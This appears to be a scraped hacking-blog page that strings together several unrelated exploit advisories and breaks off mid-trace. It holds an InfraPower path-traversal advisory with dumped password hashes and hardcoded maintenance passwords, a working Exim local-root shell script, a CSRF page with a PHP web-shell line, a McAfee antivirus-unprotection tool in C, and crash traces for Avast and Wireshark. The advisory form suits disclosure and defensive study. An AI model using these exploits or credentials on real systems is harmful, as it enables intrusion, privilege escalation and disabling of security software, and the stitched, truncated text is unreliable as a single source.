InfraPower PPS-02-S Q213V1 Local File Disclosure Vulnerability
Vendor: Austin Hughes Electronics Ltd.
Product web page: http://www.austin-hughes.com
Affected version: Q213V1 (Firmware: V2395S)
Fixed version: Q216V3 (Firmware: IPD-02-FW-v03)
Summary: InfraPower Manager PPS-02-S is a FREE built-in GUI of each
IP dongle ( IPD-02-S only ) to remotely monitor the connected PDUs.
Patented IP Dongle provides IP remote access to the PDUs by a true
network IP address chain. Only 1xIP dongle allows access to max. 16
PDUs in daisy chain - which is a highly efficient cient application
for saving not only the IP remote accessories cost, but also the true
IP addresses required on the PDU management.
Desc: InfraPower suffers from a file disclosure vulnerability when
input passed thru the 'file' parameter to 'ListFile.php' script is
not properly verified before being used to read files. This can
be exploited to disclose contents of files from local resources.
-------------------------------------------------------------------
ListFile.php:
-------------
8: if(isset($_GET['file'])){
9: $handle = $_GET['file'];
10: $fp = fopen('/ramdisk/'.$handle, 'r');
11: while(!feof($fp)){
12: $tmp=fgets($fp,2000);
13: $tmp = str_replace("\n","<br />",$tmp);
14: echo $tmp;
15: }
16: fclose($fp);
17: }
-------------------------------------------------------------------
Tested on: Linux 2.6.28 (armv5tel)
lighttpd/1.4.30-devel-1321
PHP/5.3.9
SQLite/3.7.10
Vulnerabiliy discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2016-5370
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5370.php
27.09.2016
--
http://192.168.0.17/ListFile.php?file=../../../../../../../etc/passwd
root:4g.6AafvEPx9M:0:0:root:/:/sbin/root_shell.sh
bin:x:1:1:bin:/bin:/bin/sh
daemon:x:2:2:daemon:/usr/sbin:/bin/sh
adm:x:3:4:adm:/adm:/bin/sh
lp:x:4:7:lp:/var/spool/lpd:/bin/sh
sync:x:5:0:sync:/bin:/bin/sync
shutdown:x:6:11:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
uucp:x:10:14:uucp:/var/spool/uucp:/bin/sh
operator:x:11:0:Operator:/var:/bin/sh
nobody:x:99:99:nobody:/home:/bin/sh
admin:4g.6AafvEPx9M:1000:1000:Linux User,,,:/home:/bin/login_script
user:4g.6AafvEPx9M:1001:1001:Linux User,,,:/home:/bin/login_Script
service:AsZLenpCPzc0o:0:0:root:/www:/sbin/menu_shell.sh
www:$1$tFXqWewd$3QCtiVztmLTe63e1WM3l6.:0:0:root:/www:/sbin/menu_shell.sh
www2:$1$tFXqWewd$3QCtiVztmLTe63e1WM3l6.:0:0:root:/www2:/sbin/menu_shell.sh
http://192.168.0.17/ListFile.php?file=../../../../../../../etc/web_conf
LoginAuth 1
UserName 00000000
Password 00000000
http://192.168.0.17/ListFile.php?file=../../../../../../../mnt/mtd/password_conf
dmin 999999
manager 666666
user 111111
http://192.168.0.17/ListFile.php?file=../../../../../../../sbin/maintenance_shell.sh
#!/bin/sh
echo -n "Please enter maintenance password:"
read -s pass
InfraType=`cat /mnt/mtd/main_conf | grep "InfraType" | cut -d " " -f 2`
if [ "$InfraType" == "1" ]; then
if [ "$pass" != "InfraSolution" ]; then
echo "Invalid maintenance password!"
exit 0
fi
else
if [ "$InfraType" == "2" ]; then
if [ "$pass" != "InfraGuard" ]; then
echo "Invalid maintenance password!"
exit 0
fi
else
if [ "$InfraType" == "3" ]; then
if [ "$pass" != "InfraPower" ]; then
echo "Invalid maintenance password!"
exit 0
fi
else
if [ "$InfraType" == "4" ]; then
if [ "$pass" != "InfraCool" ]; then
echo "Invalid maintenance password!"
exit 0
fi
else
#---emergency recovery mode
echo "DEBUG su mode started!"
su
fi
fi
fi
fi
# create menu
echo ""
echo "***********************************************"
echo "* Maintenance Menu *"
echo "***********************************************"
echo "(1) View(vi) /mnt/mtd/main_conf "
echo "(2) View /mnt/mtd/snmp_conf "
echo "(3) View /mnt/mtd/net_conf "
echo "(4) View /mnt/mtd/web_conf "
echo "(5) Enable auto patching(boot.sh) on bootup "
echo "(6) Disable auto patching(boot.sh) on bootup "
echo "(7) Clear all patching (/mnt/mtd/patch/) "
echo "(8) Update /www/patch/ to /mnt/mtd/patch/ "
echo "(9) Process Monitoring "
echo "(A) Patch SNMP "
echo "(B) Restore Configuration "
echo "(P) Restore INI, POL profiles "
echo "(E) Execute command line "
echo "(M) View meminfo "
echo "(X) Terminal console mode "
echo "(R) Reboot "
echo "(?) This menu "
echo "(Q) Exit "
echo "***********************************************"
while true; do
echo -n "Input Maintenance menu item number(? for help):"
read y
case $y in
"?")
echo ""
echo "***********************************************"
echo "* Maintenance Menu *"
echo "***********************************************"
echo "(1) View(vi) /mnt/mtd/main_conf "
echo "(2) View /mnt/mtd/snmp_conf "
echo "(3) View /mnt/mtd/net_conf "
echo "(4) View /mnt/mtd/web_conf "
echo "(5) Enable auto patching(boot.sh) on bootup "
echo "(6) Disable auto patching(boot.sh) on bootup "
echo "(7) Clear all patching (/mnt/mtd/patch/) "
echo "(8) Update /www/patch/ to /mnt/mtd/patch/ "
echo "(9) Process Monitoring "
echo "(A) Patch SNMP "
echo "(B) Restore Configuration "
echo "(P) Restore INI, POL profiles "
echo "(E) Execute command line "
echo "(M) View meminfo "
echo "(X) Terminal console mode "
echo "(R) Reboot "
echo "(?) This menu "
echo "(Q) Exit "
echo "***********************************************"
;;
"1")
echo "****/mnt/mtd/main_conf******************************"
vi /mnt/mtd/main_conf
echo "****************************************************"
;;
"2")
echo "****/mnt/mtd/snmp_conf******************************"
cat /mnt/mtd/snmp_conf
echo "****************************************************"
;;
"3")
echo "****/mnt/mtd/net_conf*******************************"
cat /mnt/mtd/net_conf
echo "****************************************************"
;;
"4")
echo "****/mnt/mtd/web_conf*******************************"
cat /mnt/mtd/web_conf
echo "****************************************************"
;;
"5")
echo "(5) Enable auto patching(boot.sh) on bootup "
echo -n "Are you sure to continue? [y/n]:"
read ans5
if [ "$ans5" == "y" ]; then
if [ -f "/mnt/mtd/patch/mnt/mtd/boot.sh" ]; then
echo -n "Patching boot.sh ..."
cp /mnt/mtd/patch/mnt/mtd/boot.sh /mnt/mtd/boot.sh
chmod 777 /mnt/mtd/boot.sh
if [ -f "/mnt/mtd/boot.sh" ]; then
echo "...done"
else
echo "...fail"
fi
else
echo "file not exist: /mnt/mtd/patch/boot.sh"
fi
fi
;;
"6")
echo "(6) Disable auto patching(boot.sh) on bootup "
echo -n "Are you sure to continue? [y/n]:"
read ans6
if [ "$ans6" == "y" ]; then
if [ -f "/mnt/mtd/boot.sh" ]; then
echo -n "Disabling boot.sh pacthing..."
rm /mnt/mtd/boot.sh
echo "...done"
else
echo "File not exist: /mnt/mtd/boot.sh"
fi
fi
;;
"7")
echo "(7) Clear /mnt/mtd/patch/ "
echo -n "Are you sure to continue? [y/n]:"
read ans7
if [ "$ans7" == "y" ]; then
echo -n " Removing patch files (/mnt/mtd/patch/*)..."
rm -r /mnt/mtd/patch/*
if [ ! -f "/mnt/mtd/patch/" ]; then
echo "...done"
echo -n "Reboot to apply changes? [y/n]:"
read ans7r
if [ "$ans7r" == "y" ]; then
echo "Rebooting..."
reboot
fi
else
echo "...fail"
fi
fi
;;
"8")
echo "(8) Update /www/patch/ to /mnt/mtd/patch/ "
echo -n "Are you sure to continue? [y/n]:"
read ans8
if [ "$ans8" == "y" ]; then
if [ -f "/www/patch/patch_now.sh" ]; then
chmod 777 /www/patch/patch_now.sh
sh /www/patch/patch_now.sh
else
echo "file not exist: /www/patch/patch_now.sh"
fi
fi
;;
"9")
echo "****Process List*******************************"
ps
echo "***********************************************"
;;
"A")
echo "(A) Patch SNMP "
echo -n "Are you sure to continue? [y/n]:"
read ans8
if [ "$ans8" == "y" ]; then
if [ -f "/www/patch/snmplink.sh" ]; then
sh /www/patch/snmplink.sh
if [ -f "/www/snmplink.log" ]; then
cat /www/snmplink.log
fi
echo "Patching SNMP and its modules...done"
else
echo "file not exist: /www/patch/snmplink.sh"
fi
fi
;;
"B")
echo "(B) Restore Box Configuration(box_conf) "
echo -n "Are you sure to continue? [y/n]:"
read ans8
if [ "$ans8" == "y" ]; then
if [ -f "/etc/box_conf" ]; then
echo "Patching /mnt/mtd/box_conf..."
cp /etc/box_conf /mnt/mtd/box_conf
if [ -f "/mnt/mtd/box_conf" ]; then
echo "Patching /mnt/mtd/box_conf...done"
else
echo "Patching /mnt/mtd/box_conf...failed"
fi
else
echo "file not exist: /etc/box_conf"
fi
fi
;;
"P")
INFRA_VER=`cat /etc/infratype_conf | grep "InfraType" | cut -d " " -f 2 | sed -e 's/^[ \t]*//' | sed -e 's/[ /t]*$//' | cut -d " " -f1`
echo "(P) Restore INI, POL profiles for $INFRA_VER "
echo -n "Are you sure to continue? [y/n]:"
read ansP
if [ "$ansP" == "y" ]; then
if [ "$InfraType" == "1" ]; then
echo "Restoring INI, POL profiles for $INFRA_VER..."
if [ -f "/etc/MF2_ini_$INFRA_VER" ]; then
echo -n "Found /etc/MF2_ini_$INFRA_VER, Restoring..."
cp /etc/MF2_ini_$INFRA_VER /mnt/mtd/MF2_ini
echo "...done"
fi
if [ -f "/etc/MF2_pol_$INFRA_VER" ]; then
echo -n "Found /etc/MF2_pol_$INFRA_VER, Restoring..."
cp /etc/MF2_pol_$INFRA_VER /mnt/mtd/MF2_pol
echo "...done"
fi
if [ -f "/etc/PDU3_ini_$INFRA_VER" ]; then
echo -n "Found /etc/PDU3_ini_$INFRA_VER, Restoring..."
cp /etc/PDU3_ini_$INFRA_VER /mnt/mtd/PDU3_ini
echo "...done"
fi
if [ -f "/etc/PDU3_pol_$INFRA_VER" ]; then
echo -n "Found /etc/PDU3_pol_$INFRA_VER, Restoring..."
cp /etc/PDU3_pol_$INFRA_VER /mnt/mtd/PDU3_pol
echo "...done"
fi
if [ -f "/etc/FAN2_ini_$INFRA_VER" ]; then
echo -n "Found /etc/FAN2_ini_$INFRA_VER, Restoring..."
cp /etc/FAN2_ini_$INFRA_VER /mnt/mtd/FAN2_ini
echo "...done"
fi
if [ -f "/etc/FAN2_pol_$INFRA_VER" ]; then
echo -n "Found /etc/FAN2_pol_$INFRA_VER, Restoring..."
cp /etc/FAN2_pol_$INFRA_VER /mnt/mtd/FAN2_pol
echo "...done"
fi
if [ -f "/etc/HANDLE3_ini_$INFRA_VER" ]; then
echo -n "Found /etc/HANDLE3_ini_$INFRA_VER, Restoring..."
cp /etc/HANDLE3_ini_$INFRA_VER /mnt/mtd/HANDLE3_ini
echo "...done"
fi
if [ -f "/etc/HANDLE3_pol_$INFRA_VER" ]; then
echo -n "Found /etc/HANDLE3_pol_$INFRA_VER, Restoring..."
cp /etc/HANDLE3_pol_$INFRA_VER /mnt/mtd/HANDLE3_pol
echo "...done"
fi
fi
fi
;;
"E")
echo -n "Input command line:"
read cmd_line
$cmd_line
;;
"M")
if [ -f "/mnt/mtd/log_memCheck.txt" ]; then
cat /mnt/mtd/log_memCheck.txt
fi
;;
"R")
echo "(R) Reboot "
echo -n "Are you sure to continue? [y/n]:"
read ansR
if [ "$ansR" == "y" ]; then
echo "Rebooting..."
reboot
fi
;;
"X")
echo "su mode started!"
su
;;
"Q")
echo "Leaving maintenance mode........OK"
exit 0
;;
esac
done
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863149279
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
#!/bin/sh
# CVE-2016-1531 exim <= 4.84-3 local root exploit
# ===============================================
# you can write files as root or force a perl module to
# load by manipulating the perl environment and running
# exim with the "perl_startup" arguement -ps.
#
# e.g.
# [fantastic@localhost tmp]$ ./cve-2016-1531.sh
# [ CVE-2016-1531 local root exploit
# sh-4.3# id
# uid=0(root) gid=1000(fantastic) groups=1000(fantastic)
#
# -- Hacker Fantastic
echo [ CVE-2016-1531 local root exploit
cat > /tmp/root.pm << EOF
package root;
use strict;
use warnings;
system("/bin/sh");
EOF
PERL5LIB=/tmp PERL5OPT=-Mroot /usr/exim/bin/exim -ps
<!--
Exploit title: Bluethrust Clan Scripts v4 R17 CSRF & PHP Shell Upload (Admin)
Exploit: Brandon Murphy https://www.linkedin.com/in/brandonm86
Vendor Homepage: https://bluethrust.com
Tested on: Windows 7/Firefox
Exploit Description:
Stable with Firefox 44.0. Other browsers may be unstable or may not work. Only Bluethrust Clan Scripts v4 R17 was tested but other versions may be vulnerable!
CSRF
Note: The developer applied the patch to the webapp without changing the revision number which could cause confusion to customers.
---------------------
There is no token check when changing a current user rank thus allowing CSRF to take place. When the code below is executed by an authenticated admin it will grant the defined user Commander/Admin rights.
PHP Shell Upload
-----------------------
After CSRF has taken place you can login to your account like normal. Once logged in click "My Profile>Administrator options>Modify Current Theme" or use site.com/members/console.php?cID=61. You can then insert the PHP code of your choosing into Footer. In order to add or edit code you are required to provide a special Admin Key that was defined during install. The key isn't needed as the check is faulty and can be left blank. Just insert your code and click Edit Theme. It will say the key was incorrect, but the PHP code is still inserted.
e.g. <?php $cmd=$_REQUEST['cmd']; system($cmd); ?> put into the footer code. site.com/themes/destiny/_footer.php?cmd=dir for command execution.
Timeline:
2/6/2016 - Dev notified of vulnerabilities
2/6/2016 - Dev acknowledges vulnerabilities
2/7/2016 - Patch applied and made public
3/7/2016 - Public Disclosure
Disclaimer:
I cannot be held accountable for anything you do with this code.
You take responsibility for your own actions. For educational and testing purposes only.
-->
<html>
<form action="http://site.com/clan/members/console.php?cID=8" method="POST">
<input type="hidden" name="member" value="4"/> <!-- User ID to be granted Admin -->
<input type="hidden" name="newrank" value="41"/> <!-- 41 is Commander/Admin -->
<input type="hidden" name="reason" value=""/>
<input type="hidden" name="freezetime" value="0"/>
<input type="hidden" name="submit" value="Set+Rank"/>
</form>
<script>
document.createElement('form').submit.call(document.forms[0]);
window.location.href = "http://site.com/clan/members/"; <!-- Redirect admin after CSRF takes place to avoid pop-up notification -->
</script>
</html>
Source: https://code.google.com/p/google-security-research/issues/detail?id=668
The attached PE file causes memory corruption in Avast, it looks related to authenticode parsing.
(474.c0c): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=128be364 ebx=30303030 ecx=12555e70 edx=128bd032 esi=30303030 edi=00000000
eip=740b4454 esp=10cedfa8 ebp=12555e70 iopl=0 nv up ei pl nz na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010206
aswCmnBS_74080000!StreamHashClose+0x7dd4:
740b4454 8b06 mov eax,dword ptr [esi] ds:002b:30303030=????????
0:080> ub
aswCmnBS_74080000!StreamHashClose+0x7dc5:
740b4445 55 push ebp
740b4446 56 push esi
740b4447 57 push edi
740b4448 33ff xor edi,edi
740b444a 8be9 mov ebp,ecx
740b444c 85db test ebx,ebx
740b444e 7447 je aswCmnBS_74080000!StreamHashClose+0x7e17 (740b4497)
740b4450 8b742418 mov esi,dword ptr [esp+18h]
0:080> dd esp+18 L1
10cedfc0 30303030
# It looks like this address was a parameter, lets skip up a frame and see where it comes from
0:080> kvn 3
# ChildEBP RetAddr Args to Child..............
WARNING: Stack unwind information not available. Following frames may be wrong.
00 10cedfb4 740b483e 30303030 30303030 a00be921 aswCmnBS_74080000!StreamHashClose+0x7dd4
01 10cedfe8 740c37e7 12481a88 00cf0400 00000008 aswCmnBS_74080000!StreamHashClose+0x81be
02 10cee028 740aa2f5 12481a90 00001730 00030408 aswCmnBS_74080000!asw::root::CGenericFile::seekreadin+0xf7
0:080> .frame /c 1
01 10cedfe8 740c37e7 aswCmnBS_74080000!StreamHashClose+0x81be
eax=128be364 ebx=30303030 ecx=12555e70 edx=128bd032 esi=30303030 edi=00000000
eip=740b483e esp=10cedfbc ebp=73e1dca8 iopl=0 nv up ei pl nz na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010206
aswCmnBS_74080000!StreamHashClose+0x81be:
740b483e 8bf8 mov edi,eax
0:080> ub.
aswCmnBS_74080000!StreamHashClose+0x81aa:
740b482a 0000 add byte ptr [eax],al
740b482c 0001 add byte ptr [ecx],al
740b482e 0000 add byte ptr [eax],al
740b4830 00ff add bh,bh
740b4832 7044 jo aswCmnBS_74080000!StreamHashClose+0x81f8 (740b4878)
740b4834 8bce mov ecx,esi
740b4836 ff7040 push dword ptr [eax+40h]
740b4839 e802fcffff call aswCmnBS_74080000!StreamHashClose+0x7dc0 (740b4440)
# The parameter comes from eax+40:
0:080> dd eax+40 L1
128be3a4 30303030
# What is that address?
0:080> !address @eax
Mapping file section regions...
Mapping module regions...
Mapping PEB regions...
Mapping TEB and stack regions...
Mapping heap regions...
Mapping page heap regions...
Mapping other regions...
Mapping stack trace database regions...
Mapping activation context regions...
Usage: Heap
Base Address: 128b8000
End Address: 128ea000
Region Size: 00032000
State: 00001000 MEM_COMMIT
Protect: 00000004 PAGE_READWRITE
Type: 00020000 MEM_PRIVATE
Allocation Base: 12150000
Allocation Protect: 00000004 PAGE_READWRITE
More info: heap owning the address: !heap 0x120000
More info: heap segment
More info: heap entry containing the address: !heap -x 0x128be364
# It's a heap buffer, is it valid?
0:080> !heap -x 0x128be364
Entry User Heap Segment Size PrevSize Unused Flags
-----------------------------------------------------------------------------
128bd038 128bd040 00120000 122ef5e0 1408 - 3f LFH;busy.
# Looks okay to me, where does that buffer come from?
0:080> .frame /c 2
02 10cee028 740aa2f5 aswCmnBS_74080000!asw::root::CGenericFile::seekreadin+0xf7
eax=128be364 ebx=30303030 ecx=12555e70 edx=128bd032 esi=30303030 edi=00000000
eip=740c37e7 esp=10cedff0 ebp=128be364 iopl=0 nv up ei pl nz na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010206
aswCmnBS_74080000!asw::root::CGenericFile::seekreadin+0xf7:
740c37e7 83c40c add esp,0Ch
0:080> ub
aswCmnBS_74080000!asw::root::CGenericFile::seekreadin+0xe3:
740c37d3 0000 add byte ptr [eax],al
740c37d5 0000 add byte ptr [eax],al
740c37d7 8b464c mov eax,dword ptr [esi+4Ch]
740c37da 57 push edi
740c37db 0345e8 add eax,dword ptr [ebp-18h]
740c37de 50 push eax
740c37df ff7510 push dword ptr [ebp+10h]
740c37e2 e88bc70000 call aswCmnBS_74080000!BZ2_bzerr+0x1d62 (740cff72)
0:080> dd ebp-18 L1
128be34c 57d9ddea
That is a really strange offset! And that DWORD appears in the input file at offset 316b3h:
│000316a0 a8 65 18 e9 79 40 62 25-96 6e c7 c7 37 6a 83 21 |?e??y@b%?n??7j?!|...
│000316b0 08 8e 41 ea dd d9 57 3f-1d 77 49 87 2a 16 06 5e |??A???W??wI?*??^|...
│000316c0 a6 38 6a 22 12 a3 51 19-83 7e b6 00 00 31 82 04 |?8j"??Q??~? 1??|...
This looks like broken authenticode parsing to me.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39530.zip
########################################################################################
# Title: Adobe Digital Editions <= 4.5.0 - Critical memory corruption
# Application: Adobe Digital Editions
# Version: 4.5.0 and earlier versions
# Platform: Windows, Macintosh, iOS and Android
# Software Link: http://www.adobe.com/solutions/ebook/digital-editions.html
# Date: March 8, 2016
# CVE: CVE-2016-0954
# Author: Pier-Luc Maltais from COSIG
# Contact: https://twitter.com/COSIG_
# Personal contact: https://twitter.com/plmaltais
########################################################################################
===================
Introduction:
===================
Adobe® Digital Editions software offers an engaging way to view and manage eBooks and
other digital publications. Use it to download and purchase digital content, which can
be read both online and offline. Transfer copy-protected eBooks from your personal
computer to other computers or devices. Organize your eBooks into a custom library and
annotate pages. Digital Editions also supports industry-standard eBook formats,
including PDF/A and EPUB. (http://www.adobe.com/ca_fr/products/digital-editions.html)
########################################################################################
===================
Report Timeline:
===================
2015-10-24: Pier-Luc Maltais from COSIG found the issue and report it to Adobe PSIRT.
2016-03-08: Vendor fixed the issue (APSB16-06).
2016-03-08: Release of this advisory.
########################################################################################
===================
Technical details:
===================
A critical memory corruption occurs when Adobe Digital Editions handle a specially
crafted ExtGstate object, which could lead to remote code execution.
########################################################################################
==========
POC:
==========
https://plmsecurity.net/sites/plmsecurity.net/files/APSB16-06_PoC.pdf
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39533.zip
########################################################################################
/*
Security Advisory @ Mediaservice.net Srl
(#01, 13/04/2016) Data Security Division
Title: McAfee VirusScan Enterprise security restrictions bypass
Application: McAfee VirusScan Enterprise 8.8 and prior versions
Platform: Microsoft Windows
Description: A local Windows administrator is able to bypass the
security restrictions and disable the antivirus engine
without knowing the correct management password
Author: Maurizio Agazzini <inode@mediaservice.net>
Vendor Status: Fixed
References: http://lab.mediaservice.net/advisory/2016-01-mcafee.txt
http://lab.mediaservice.net/code/mcafee_unprotector.c
1. Abstract.
McAfee VirusScan Enterprise has a feature to protect the scan engine
from local Windows administrators. A management password is needed to
disable it, unless Windows is running in "Safe Mode".
>From our understanding this feature is implemented insecurely: the
McAfee VirusScan Console checks the password and requests the engine to
unlock the safe registry keys. No checks are done by the engine itself,
so anyone can directly request the engine to stop without knowing the
correct management password.
2. Example Attack Session.
The attack can be reproduced in different ways, here are some examples.
Example 1:
Open the McAfee VirusScan Console and Sysinternals Process Explorer.
Under Process Explorer:
- Locate the mcconsol.exe process
- Type CTRL+L (show lower pane)
- Search for all "HKLM\SOFTWARE\McAfee\DesktopProtection" keys
- Close all the handles of this registry key
Go back to the McAfee Console and:
- Go to: Tools -> General Options
- Select the "Password Options" tab
- Select "No password" and apply settings
Now it is possible to stop the antivirus engine.
Example 2:
A specific tool has been written to request to disable password
protection. After running the tool you can disable it via the VirusScan
Console.
Code: http://lab.mediaservice.net/code/mcafee_unprotector.c
3. Affected Platforms.
All McAfee Viruscan Enterprise versions prior to 8.8 without SB10151 are
affected. Exploitation of this vulnerability requires that an attacker
has local Windows administrator privileges.
4. Fix.
On 25 February 2016, version SB10151 hotfix has been relased by McAfee,
which fixes the described vulnerability.
https://kc.mcafee.com/corporate/index?page=content&id=SB10151
5. Proof Of Concept.
See Example Attack Session above.
6. Timeline
07/11/2014 - First communication sent to McAfee
17/11/2014 - Second communication sent to McAfee
17/11/2014 - McAfee: Request to send again vulnerability information
18/11/2014 - Sent vulnerability information and PoC again
11/12/2014 - McAfee: Problem confirmed
09/03/2015 - Request for update to McAfee
06/05/2015 - Request for update to McAfee
06/05/2015 - McAfee: Patch release planned for Q3
20/08/2015 - McAfee: Request for deadline delay (31/03/2016)
25/02/2016 - McAfee: SB10151 patch has been relased
Copyright (c) 2014-2016 @ Mediaservice.net Srl. All rights reserved.
--
Maurizio Agazzini CISSP, CSSLP, OPST
Senior Security Advisor
@ Mediaservice.net Srl Tel: +39-011-32.72.100
Via Santorelli, 15 Fax: +39-011-32.46.497
10095 Grugliasco (TO) ITALY http://mediaservice.net/disclaimer
"C programmers never die. They are just cast into void"
*/
/*****************************************************************************
* *
* McAfee Data Protector "Unprotector" *
* *
* A little tool to request McAfee scan engine to disable password *
* protection. *
* *
* Advisory: http://lab.mediaservice.net/advisory/2014-01-mcafee.txt *
* *
* This program can be compiled with MinGW (http://www.mingw.org/) *
* *
* Copyright (c) 2014 @ Mediaservice.net Srl. All rights reserved *
* Wrote by Maurizio Agazzini <inode[at]mediaservice.net> *
* *
* This program is free software; you can redistribute it and/or *
* modify it under the terms of the GNU General Public License *
* as published by the Free Software Foundation; either version 2 *
* of the License, or (at your option) any later version. *
* *
* This program is distributed in the hope that it will be useful, *
* but WITHOUT ANY WARRANTY; without even the implied warranty of *
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the *
* GNU General Public License for more details. *
* *
* You should have received a copy of the GNU General Public License *
* along with this program; if not, write to the Free Software *
* Foundation, Inc., 59 Temple Place *
* Suite 330, Boston, MA 02111-1307, USA. *
* *
*****************************************************************************/
#include <stdio.h>
#include <windows.h>
HANDLE opendevice()
{
HANDLE result;
if((result = CreateFile("\\\\.\\WGUARDNT", GENERIC_READ, 0, NULL, OPEN_EXISTING, FILE_FLAG_OVERLAPPED, NULL) ) == NULL)
if((result = CreateFile("\\\\.\\Global\\WGUARDNT", GENERIC_READ, 0, NULL, OPEN_EXISTING, FILE_FLAG_OVERLAPPED, NULL) ) == NULL)
if((result = CreateFile("\\\\.\\WGUARDNT", GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, FILE_FLAG_OVERLAPPED, NULL) ) == NULL)
if((result = CreateFile("\\\\.\\Global\\WGUARDNT", GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, FILE_FLAG_OVERLAPPED, NULL) ) == NULL)
result = 0;
return result;
}
void main(int argc, char ** argv)
{
HKEY reg_key = NULL;
HANDLE p;
DWORD BytesReturned;
DWORD data = 0;
unsigned long size = 4;
DWORD type = REG_DWORD;
DWORD data1 = 0;
char status[4][70]= {
"No password",
"Password protection for all items listed",
"Password protection for the selected items",
"Password protection for conformance to Common Criteria"
};
printf("\n *******************************************\n");
printf(" * McAfee Desktop Protection \"Unprotector\" *\n");
printf(" *******************************************\n\n");
/*
* The PoC use HKLM\SOFTWARE\McAfee\DesktopProtection\UIPMode registry key to
* disable the password protection, but you can also access to others useful
* keys.
*
* User Password
* HKLM\SOFTWARE\McAfee\DesktopProtection\UIP
* HKLM\SOFTWARE\McAfee\DesktopProtection\UIPEx
*
* Buffer protection
* HKLM\SOFTWARE\McAfee\SystemCore\VSCore\On Access Scanner\BehaviourBlocking\BOPEnabled
*
* Access protection
* HKLM\SOFTWARE\McAfee\SystemCore\VSCore\On Access Scanner\BehaviourBlocking\APEnabled
*
* On Access Scanner
* HKLM\SOFTWARE\McAfee\DesktopProtection\OASState
* HKLM\SOFTWARE\McAfee\SystemCore\VSCore\On Access Scanner\McShield\Configuration\OASEnabled
*
* Others
* HKLM\SOFTWARE\McAfee\SystemCore\VSCore\LockDownEnabled
*
*/
if (RegOpenKeyEx (HKEY_LOCAL_MACHINE, "SOFTWARE\\McAfee\\DesktopProtection", 0, KEY_QUERY_VALUE | KEY_READ | 0x0200, ®_key) != ERROR_SUCCESS)
{
if (RegOpenKeyEx (HKEY_LOCAL_MACHINE, "SOFTWARE\\\Wow6432Node\McAfee\\DesktopProtection", 0, KEY_QUERY_VALUE | KEY_READ | 0x0200, ®_key) != ERROR_SUCCESS)
{
printf("Error opening registry key...\n");
return;
}
}
// Check current status of McAfee protection
RegQueryValueEx(reg_key,"UIPMode",NULL, &type,(BYTE *)&data,&size);
printf(" [+] Current UIPMode = %d (%s)\n\n", data, status[data]);
RegCloseKey (reg_key);
// Open McAfee magic device
p = opendevice();
printf(" [-] Please John, let me write to your registry keys...");
// Request to the scan engine to stop protect registry keys
DeviceIoControl(p, 0x9EDB6510u, 0, 0, 0, 0, &BytesReturned, 0);
if (RegOpenKeyEx (HKEY_LOCAL_MACHINE, "SOFTWARE\\McAfee\\DesktopProtection", 0, KEY_QUERY_VALUE | KEY_READ | KEY_SET_VALUE, ®_key) != ERROR_SUCCESS)
if (RegOpenKeyEx (HKEY_LOCAL_MACHINE, "SOFTWARE\\McAfee\\DesktopProtection", 0, KEY_QUERY_VALUE | KEY_READ | KEY_SET_VALUE, ®_key) != ERROR_SUCCESS)
{
printf(" hmmm hmmm something went wrong!\n\n");
printf(" [-] Ok John, take the control again!\n");
DeviceIoControl(p, 0x9EDB6514u, 0, 0, 0, 0, &BytesReturned, 0);
CloseHandle(p);
return;
}
printf(" OK\n");
data1 = 0;
if( argc > 1 )
data1 = atoi(argv[1]);
// Disable McAfee protection
if( RegSetValueEx(reg_key, "UIPMode", 0, REG_DWORD, (CONST BYTE *)&data1, sizeof(DWORD)) != ERROR_SUCCESS)
printf("\n hmmm hmmm something went wrong!\n");
else
printf("\n [+] Thank you! now we got the control! UIPMode = %d\n",data1);
RegCloseKey (reg_key);
printf("\n [+] Run \"%s %d\" to get original settings\n\n",argv[0],data);
// Tell to engine to take control again
printf(" [-] Ok John, take the control again!\n");
DeviceIoControl(p, 0x9EDB6514u, 0, 0, 0, 0, &BytesReturned, 0);
CloseHandle(p);
}
Source: https://code.google.com/p/google-security-research/issues/detail?id=739
The following crash due to a use-after-free condition can be observed in an ASAN build of Wireshark (current git master), by feeding a malformed file to tshark ("$ ./tshark -nVxr /path/to/file"):
--- cut ---
==6853==ERROR: AddressSanitizer: heap-use-after-free on address 0x60400009d960 at pc 0x7ff7905dc0fe bp 0x7fff079e9fc0 sp 0x7fff079e9fb8
READ of size 4 at 0x60400009d960 thread T0
#0 0x7ff7905dc0fd in wtap_optionblock_free wireshark/wiretap/wtap_opttypes.c:161:20
#1 0x7ff7905d7b58 in wtap_close wireshark/wiretap/wtap.c:1211:4
#2 0x52a08b in load_cap_file wireshark/tshark.c:3685:3
#3 0x51e4bc in main wireshark/tshark.c:2213:13
0x60400009d960 is located 16 bytes inside of 40-byte region [0x60400009d950,0x60400009d978)
freed by thread T0 here:
#0 0x4c1d80 in __interceptor_free llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:30
#1 0x7ff7905dc32f in wtap_optionblock_free wireshark/wiretap/wtap_opttypes.c:173:9
#2 0x7ff7905d7b58 in wtap_close wireshark/wiretap/wtap.c:1211:4
#3 0x52a08b in load_cap_file wireshark/tshark.c:3685:3
#4 0x51e4bc in main wireshark/tshark.c:2213:13
previously allocated by thread T0 here:
#0 0x4c2098 in malloc llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:40
#1 0x7ff77bc84610 in g_malloc (/lib/x86_64-linux-gnu/libglib-2.0.so.0+0x4e610)
